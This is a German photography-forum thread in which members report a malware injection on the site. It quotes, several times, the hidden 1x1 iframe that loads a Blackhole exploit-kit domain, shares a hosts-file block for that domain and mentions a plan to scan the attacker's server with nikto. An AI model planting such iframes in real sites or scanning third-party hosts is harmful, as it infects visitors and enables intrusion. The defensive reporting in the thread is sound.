• Herzlich willkommen im "neuen" DSLR-Forum!

    Wir hoffen, dass Euch das neue Design und die neuen Features gefallen und Ihr Euch schnell zurechtfindet.
    Wir werden wohl alle etwas Zeit brauchen, um uns in die neue Umgebung einzuleben. Auch für uns ist das alles neu.

    Euer DSLR-Forum-Team

  • In eigener Sache!

    Liebe Mitglieder, liebe Besucher und Gäste
    ich weiß, es ist ein leidiges Thema, aber ich muss es ansprechen: Werbung, Werbeblocker und Finanzierung des Forums.
    Bitte hier weiterlesen ...

  • DSLR-Forum Fotowettbewerb neu erfunden!
    Nach wochenlanger intensiver Arbeit an der Erneuerung des Formates unseres internen Fotowettbewerbes ist es Frosty als Moderator
    und au lait als Programmierer gelungen, unseren Wettbewerb auf ein völlig neues Level zu heben!
    Lest hier alle Infos zum DSLR-Forum Fotowettbewerb 2.0
    Einen voll funktionsfähigen Demowettbewerb kannst du dir hier ansehen.
  • Neuer Partner: AkkuShop.de
    Akkus, Ladegeräte und mehr (nicht nur) für Digitalkameras und Drohnen
  • Neuer Gutscheincode unseres Partners Schutzfolien24:
    DSLR-Forum2024
    Dauerhaft 10% Rabatt auf alle Displayschutzfolien der Eigenmarken "Upscreen", "Brotec", "Savvies".
    Der Code ist für alle Geräteklassen gültig.
  • Stimmt ab über die Sieger des DSLR-Forum Fotowettbewerbs April 2024.
    Thema: "Sprichwörtlich"
    Nur noch bis zum 30.04.2024 23:59!
    Jeder darf abstimmen!
    Zur Abstimmung und Bewertung hier lang
WERBUNG

Forum schon wieder verseucht ?

Status
Für weitere Antworten geschlossen.
bei mir auch.
 
Es ist schon wieder so weit, und die Attacken werden heftiger.
Jetzt schlagen sogar Programme an, die vorher noch nicht gemeckert hatten.
Es ist jetzt auf jeder Seite usw. Was kommt als nächstes?

Der Admin sollte vBulletin mal mächtig in den hintern treten!

Ich glaube ehrlich gesagt nicht das sich irgend ein Virus installiert der die Platte killt, ist denke ich nur ein Bruder/Kollege des berüchtigten Conficker.

Man weiß nicht was oder warum, aber die Jungs haben was großes vor! Weltweit ist jeder 4. PC Conficker verseucht. Der macht nichts, schlummert nur.
Ist der mächtigste Worm.

Irgendwann werden die infizierten Zombi-PCs aktiv und schlagen zu.

So eine mächtige Waffe (Millarden PCs) kann das Internet lahm legen, vor ein paar Jahren haben 1000 Zombie-PCs eine Kreditkartenfirma Tagelang lahmgelegt.

Kam erst vor ein paar Tagen ein Bericht bei Galileo drüber. Man weiß nicht wer dahinter steckt und was er/die vorhaben. Irgendwie unheimlich,...

Gruß,
Andi
 
Zuletzt bearbeitet:
hier auch
Code: 
<iframe src="http : //ixv36477.ipq.co/?r=302" border="0" height="1" width="1"></iframe>

und Avast meldet folgendes

Anhang anzeigen 1835092

Ein Kollege hat ein WoltLab Forum, da war es voriges Jahr auch so das ein kleines Icon mit verlinkung eingepflanzt wurde.
Es war danach so das jedes Files des Forums damit verseucht war.
 
Zuletzt bearbeitet:
<a name="top"></a><iframe src="http://ixv36477.ipq.co/?r=302" height="1" width="1" border="0"></iframe>
<table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
<tr>

wieder das gleiche Problem, schätze mal um ein vbulletin-Upgrade kommt das Forum jetzt einfach nicht mehr herum.
 
Auch mein Norton 360 meldet bei jedem Seitenaufruf eine "web attacke : blackhole toolkit website 5"

laut Symantec Security Response ist es eine Massen-Injection Kampagne mit dem BlackHole Toolkit... siehe hier

hoffe es wird hier bald was unternommen!
 
Muhahaha, langsam wird es immer interessanter im DSLR-Forum, soviele massive und andauernde Angriffe sind echt... wow :D

Bei mir ist es noch immer sauber - hab alles aktiviert was schützt bzw. alles deaktiviert / geblockt, was mir böses will.


Liebe Grüße und happy hunting,
Kevin.
 
Fawkes84 schrieb:
Woher hast du diese Weisheit? Sorry, aber ich glaub DU hast keine Ahnung von IT-Sicherheit. Windows-Updates, Programme aktuell, Virenscanner aktuell, Firewall, etc. sind alles nur Maßnahmen zum Schutz, keine Garantie.^^
[...]
Sorry, aber ich bin Fachinformatiker für Systemintegration und habe vor meinem aktuellen Studium in der IT-Security eines großen Systemhauses gearbeitet.
Zum Vergrößern anklicken....

:rolleyes: Und trotzdem fängst du dir hier solche Sachen ein? Seltsam...
(Mit Adminrechten unterwegs? :rolleyes:)
Ich hab es weiter oben schonmal erwähnt:
Ich weiss nicht was ich richtig mache was hier einige falsch machen, aber ich habe mir auf keinem meiner 4 Systeme (Rechner auf der Arbeit mitgerechnet) hier irgendetwas auch nur im entferntesten eingefangen... (Alle ganz normale Windowssysteme, XP Pro, XP Home, 7 Home Pro und 7 Enterprise, alle mit normalen Userkonten und normalen Virenscannern... Firefox mit RequestPolicy-Plugin)

Und was "Sicherheitsabteilungen" angeht, bin ich wohl wirklich von Firmen verwöhnt, in denen jeder Admin selbst für die Sicherheit seiner Systeme verantwortlich ist... (Ok, dort waren/sind FIS auch maximal im Clientbereich anzutreffen ;))

Zurück zum Problem:
Aktuell ist der Schädling wohl wieder aktiv...
RequestPolicy blockiert zumindest aktuell wieder Anfragen von IPQ.co....
Diese Domain scheint die einzige konstante bei den aktuellen Attacken zu sein.

Wer auf Nummer Sicher gehen will, trägt sich die Zeile
127.0.0.1 ipq.co
in seine hosts-Datei ein, damit sämtliche Anfragen dorthin ins leere laufen! (Wenn möglich am besten direkt in den DNS des Routers!)

(Den Tip habe ich vor Wochen schon gegeben, aber die Threads liest ja keiner mehr ;) )
 
castle-of-teck schrieb:
wieder das gleiche Problem, schätze mal um ein vbulletin-Upgrade kommt das Forum jetzt einfach nicht mehr herum.
Zum Vergrößern anklicken....

Ihr lest nicht mit, was der Betreiber hier geschrieben hat - sonst würdet Ihr wissen, dass die gepatchte "alte" vbulletin-Version nach Aussage des vBulletin-Teams den gleichen "Sicherheitsstand" (ich schreibe das mal in Anführungszeichen) aufweist wie die allerneueste. Allerdings hat die neueste Version nicht unbedingt die gleiche Systemstabilität wie die "ältere" - ein Umstand, worauf ein großes und auf Hochverfügbarkeit ausgerichtetes Forum tunlichst achten muss.

LG Steffen
 
Zuletzt bearbeitet:
Mein Virenscanner (Nod Eset) hat den o.g. Schädling (Post #271) ebenfalls geblock als ich hier eben auf die Seite bin.

Hoffentlich kann das bald behoben werden.
 
Zuletzt bearbeitet:
Dem kann ich mich nur anschließen

Kaspersky schreit ebenfalls

h**p://ixv36477.ipq.co/?r=302

ist der Verursacher

//EDIT:

Es dürfte dieses Frame sein (blau markiert im linken oberen Eck)
 
Zuletzt bearbeitet:
Ich habe diesen komischen Fleck links oben auch. Mein Kaspersky schreit aber nicht!

Ich lasse gerade mal wieder scannen...

Aktuell bin ich nicht als admin meines PCs eingeloggt. Hoffe, dass das ein Vorteil ist. Aber mich wundert schon, dass bei Euch die Wachhunde anschlagen und bei mir Kaspersky friedlich bleibt.. *grübel*
 
hier mal das was Firebug zu dem "miniFrame" beim Logo ausspuckt:

Code: 
<iframe height="1" width="1" border="0" src="http://ixv36477.ipq.co/?r=302">
 
Ich Analysiere den "feindlichen" Host grade mal wieder...

Diesmal scheinen die Angriffe anders zu sein als beim letzten Mal...
Die Seite aus dem iFrame leitet einen direkt um zu uploadedarchivez.com/index.php?tp=xxxxxxxxxxx (editiert)

Ich werd mal schauen ob ich den Schädling zu fassen kriege und durch den Disassembler jagen kann... vielleicht lässt sich diesmal herausfinden welche Lücken hier ausgenutzt werden...

Aber erst mal ist der feindliche Server dran... mal sehn was nikto ausspuckt ;)
 
Zuletzt bearbeitet:
Hi, ich habe nichts bekommen. Allerdings habe ich den Tip befolgt Noscript zu installieren. Ich habe aber auch im Noscript Iframe und Frame verbieten aktiviert, das DSLR Forum wurde von mir als nicht vertrauenswürdig eingestellt! Kaspersky läuft auf der höchsten Sicherheitsstufe.
 
Status
Für weitere Antworten geschlossen.
WERBUNG
Zurück
Oben Unten